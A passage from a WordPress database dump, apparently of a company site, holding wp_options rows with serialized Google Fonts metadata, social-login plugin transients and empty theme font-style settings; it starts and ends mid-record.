:5:"files";a:4:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/volkhov/v8/MDIZAofe1T_J3un5Kgo8zg.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/volkhov/v8/1rTjmztKEpbkKH06JwF8Yw.ttf";i:700;s:85:"http://fonts.gstatic.com/s/volkhov/v8/L8PbKS-kEoLHm7nP--NCzPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/volkhov/v8/W6oG0QDDjCgj0gmsHE520C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Volkhov:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Volkhov:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Volkhov:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Volkhov:700italic";}}s:8:"vollkorn";a:7:{s:4:"name";s:8:"Vollkorn";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/vollkorn/v6/IiexqYAeh8uII223thYx3w.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/vollkorn/v6/UuIzosgR1ovBhJFdwVp3fvesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:86:"http://fonts.gstatic.com/s/vollkorn/v6/gOwQjJVGXlDOONC12hVoBqCWcynf_cDxXwCLxiixG1c.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/vollkorn/v6/KNiAlx6phRqXCwnZZG51JAJKKGfqHaYFsRG-T3ceEVo.ttf";}s:4:"urls";a:4:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Vollkorn:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Vollkorn:italic";i:700;s:52:"https://fonts.googleapis.com/css?family=Vollkorn:700";s:9:"700italic";s:58:"https://fonts.googleapis.com/css?family=Vollkorn:700italic";}}s:8:"voltaire";a:7:{s:4:"name";s:8:"Voltaire";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/voltaire/v6/WvqBzaGEBbRV-hrahwO2cA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Voltaire:regular";}}s:23:"waiting_for_the_sunrise";a:7:{s:4:"name";s:23:"Waiting for the Sunrise";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:98:"http://fonts.gstatic.com/s/waitingforthesunrise/v7/eNfH7kLpF1PZWpsetF-ha9TChrNgrDiT3Zy6yGf3FnM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:71:"https://fonts.googleapis.com/css?family=Waiting+for+the+Sunrise:regular";}}s:8:"wallpoet";a:7:{s:4:"name";s:8:"Wallpoet";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/wallpoet/v8/hmum4WuBN4A0Z_7367NDIg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Wallpoet:regular";}}s:15:"walter_turncoat";a:7:{s:4:"name";s:15:"Walter Turncoat";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/walterturncoat/v6/sG9su5g4GXy1KP73cU3hvQplL2YwNeota48DxFlGDUo.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Walter+Turncoat:regular";}}s:6:"warnes";a:7:{s:4:"name";s:6:"Warnes";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/warnes/v6/MXG7_Phj4YpzAXxKGItuBw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Warnes:regular";}}s:9:"wellfleet";a:7:{s:4:"name";s:9:"Wellfleet";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/wellfleet/v4/J5tOx72iFRPgHYpbK9J4XQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Wellfleet:regular";}}s:9:"wendy_one";a:7:{s:4:"name";s:9:"Wendy One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/wendyone/v4/R8CJT2oDXdMk_ZtuHTxoxw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Wendy+One:regular";}}s:8:"wire_one";a:7:{s:4:"name";s:8:"Wire One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/wireone/v7/sRLhaQOQpWnvXwIx0CycQw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Wire+One:regular";}}s:9:"work_sans";a:7:{s:4:"name";s:9:"Work Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:9:{i:0;s:3:"100";i:1;s:3:"200";i:2;s:3:"300";i:3;s:7:"regular";i:4;s:3:"500";i:5;s:3:"600";i:6;s:3:"700";i:7;s:3:"800";i:8;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:9:{i:100;s:86:"http://fonts.gstatic.com/s/worksans/v2/ZAhtNqLaAViKjGLajtuwWaCWcynf_cDxXwCLxiixG1c.ttf";i:200;s:86:"http://fonts.gstatic.com/s/worksans/v2/u_mYNr_qYP37m7vgvmIYZy3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:86:"http://fonts.gstatic.com/s/worksans/v2/FD_Udbezj8EHXbdsqLUply3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:65:"http://fonts.gstatic.com/s/worksans/v2/zVvigUiMvx7JVEnrJgc-5Q.ttf";i:500;s:86:"http://fonts.gstatic.com/s/worksans/v2/Nbre-U_bp6Xktt8cpgwaJC3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:86:"http://fonts.gstatic.com/s/worksans/v2/z9rX03Xuz9ZNHTMg1_ghGS3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:86:"http://fonts.gstatic.com/s/worksans/v2/4udXuXg54JlPEP5iKO5AmS3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:86:"http://fonts.gstatic.com/s/worksans/v2/IQh-ap2Uqs7kl1YINeeEGi3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:86:"http://fonts.gstatic.com/s/worksans/v2/Hjn0acvjHfjY_vAK9Uc6gi3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:9:{i:100;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:100";i:200;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:200";i:300;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Work+Sans:regular";i:500;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:500";i:600;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:600";i:700;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:700";i:800;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:800";i:900;s:53:"https://fonts.googleapis.com/css?family=Work+Sans:900";}}s:17:"yanone_kaffeesatz";a:7:{s:4:"name";s:17:"Yanone Kaffeesatz";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{i:200;s:94:"http://fonts.gstatic.com/s/yanonekaffeesatz/v7/We_iSDqttE3etzfdfhuPRbq92v6XxU4pSv06GI0NsGc.ttf";i:300;s:94:"http://fonts.gstatic.com/s/yanonekaffeesatz/v7/We_iSDqttE3etzfdfhuPRZlIwXPiNoNT_wxzJ2t3mTE.ttf";s:7:"regular";s:94:"http://fonts.gstatic.com/s/yanonekaffeesatz/v7/YDAoLskQQ5MOAgvHUQCcLdXn3cHbFGWU4T2HrSN6JF4.ttf";i:700;s:94:"http://fonts.gstatic.com/s/yanonekaffeesatz/v7/We_iSDqttE3etzfdfhuPRf2R4S6PlKaGXWPfWpHpcl0.ttf";}s:4:"urls";a:4:{i:200;s:61:"https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:200";i:300;s:61:"https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:300";s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:regular";i:700;s:61:"https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:700";}}s:11:"yantramanav";a:7:{s:4:"name";s:11:"Yantramanav";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"100";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"700";i:5;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:6:{i:100;s:89:"http://fonts.gstatic.com/s/yantramanav/v1/Rs1I2PF4Z8GAb6qjgvr8wIAWxXGWZ3yJw6KhWS7MxOk.ttf";i:300;s:89:"http://fonts.gstatic.com/s/yantramanav/v1/HSfbC4Z8I8BZ00wiXeA5bC9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/yantramanav/v1/FwdziO-qWAO8pZg8e376kaCWcynf_cDxXwCLxiixG1c.ttf";i:500;s:89:"http://fonts.gstatic.com/s/yantramanav/v1/HSfbC4Z8I8BZ00wiXeA5bMCNfqCYlB_eIx7H1TVXe60.ttf";i:700;s:89:"http://fonts.gstatic.com/s/yantramanav/v1/HSfbC4Z8I8BZ00wiXeA5bHe1Pd76Vl7zRpE7NLJQ7XU.ttf";i:900;s:89:"http://fonts.gstatic.com/s/yantramanav/v1/HSfbC4Z8I8BZ00wiXeA5bCenaqEuufTBk9XMKnKmgDA.ttf";}s:4:"urls";a:6:{i:100;s:55:"https://fonts.googleapis.com/css?family=Yantramanav:100";i:300;s:55:"https://fonts.googleapis.com/css?family=Yantramanav:300";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Yantramanav:regular";i:500;s:55:"https://fonts.googleapis.com/css?family=Yantramanav:500";i:700;s:55:"https://fonts.googleapis.com/css?family=Yantramanav:700";i:900;s:55:"https://fonts.googleapis.com/css?family=Yantramanav:900";}}s:9:"yatra_one";a:7:{s:4:"name";s:9:"Yatra One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/yatraone/v1/ApKQzWF7_vG0Lt5TDqgUvw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Yatra+One:regular";}}s:10:"yellowtail";a:7:{s:4:"name";s:10:"Yellowtail";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/yellowtail/v6/HLrU6lhCTjXfLZ7X60LcB_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Yellowtail:regular";}}s:10:"yeseva_one";a:7:{s:4:"name";s:10:"Yeseva One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/yesevaone/v10/eenQQxvpzSA80JmisGcgX_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Yeseva+One:regular";}}s:10:"yesteryear";a:7:{s:4:"name";s:10:"Yesteryear";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/yesteryear/v5/dv09hP_ZrdjVOfZQXKXuZvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Yesteryear:regular";}}s:4:"yrsa";a:7:{s:4:"name";s:4:"Yrsa";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:5:{i:300;s:61:"http://fonts.gstatic.com/s/yrsa/v1/YI0C1syzAYpkrPx27UnC2w.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/yrsa/v1/JWX_dCK4_Jq-oqF7r9rFHg.ttf";i:500;s:61:"http://fonts.gstatic.com/s/yrsa/v1/rWuZmBLHIeKRbnfSvWCvYg.ttf";i:600;s:61:"http://fonts.gstatic.com/s/yrsa/v1/1413P-oEfrq-tBIdqnslDQ.ttf";i:700;s:61:"http://fonts.gstatic.com/s/yrsa/v1/iV49zaJV5wyo_4LgxE2yng.ttf";}s:4:"urls";a:5:{i:300;s:48:"https://fonts.googleapis.com/css?family=Yrsa:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Yrsa:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Yrsa:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Yrsa:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Yrsa:700";}}s:6:"zeyada";a:7:{s:4:"name";s:6:"Zeyada";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/zeyada/v6/hmonmGYYFwqTZQfG2nRswQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Zeyada:regular";}}}', 'no'); 
INSERT INTO `wp_options` VALUES (690518, '_site_transient_timeout_n_nextend5996ee47bcd773.78941601', '1503067223', 'no'); 
INSERT INTO `wp_options` VALUES (690519, '_site_transient_n_nextend5996ee47bcd773.78941601', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690520, '_site_transient_timeout_nextend5996ee47bcd773.78941601_fb_state', '1503067223', 'no'); 
INSERT INTO `wp_options` VALUES (690521, '_site_transient_nextend5996ee47bcd773.78941601_fb_state', '76ef1db79cb028f404c57d15683a5071', 'no'); 
INSERT INTO `wp_options` VALUES (690522, '_site_transient_timeout_nextend5996ee47bcd773.78941601_fb_r', '1503067223', 'no'); 
INSERT INTO `wp_options` VALUES (690523, '_site_transient_nextend5996ee47bcd773.78941601_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (690544, '_site_transient_timeout_n_nextend5996fb69e2f647.44462953', '1503070585', 'no'); 
INSERT INTO `wp_options` VALUES (690545, '_site_transient_n_nextend5996fb69e2f647.44462953', '1', 'no'); 
INSERT INTO `wp_options` VALUES (690546, '_site_transient_timeout_nextend5996fb69e2f647.44462953_fb_state', '1503070586', 'no'); 
INSERT INTO `wp_options` VALUES (690547, '_site_transient_nextend5996fb69e2f647.44462953_fb_state', 'f3a8e75e0bb32210f68e5c94345a64dc', 'no'); 
INSERT INTO `wp_options` VALUES (690548, '_site_transient_timeout_nextend5996fb69e2f647.44462953_fb_r', '1503070586', 'no'); 
INSERT INTO `wp_options` VALUES (690549, '_site_transient_nextend5996fb69e2f647.44462953_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (690589, '_transient_tt_font_theme_options', 'a:8:{s:15:"tt_default_body";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_1";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_2";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_3";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_4";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2: